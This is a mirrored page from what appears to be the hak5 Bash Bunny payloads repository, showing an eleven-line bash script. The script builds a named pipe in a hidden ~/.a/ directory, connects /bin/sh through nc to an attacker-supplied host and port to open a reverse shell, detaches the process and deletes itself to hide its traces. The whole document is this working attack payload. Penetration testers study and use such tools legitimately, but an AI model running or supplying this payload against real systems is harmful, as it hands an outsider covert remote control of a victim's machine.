mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
11 lines
143 B
Bash
11 lines
143 B
Bash
#!/bin/bash
|
|
A="$0"
|
|
H=$1
|
|
P=$2
|
|
rm -rf ~/.a/
|
|
mkdir -p ~/.a/
|
|
mknod ~/.a/p p
|
|
/bin/sh -c /bin/sh 0<~/.a/p | nc $H $P 1>~/.a/p &
|
|
disown $!
|
|
rm -f "$A"
|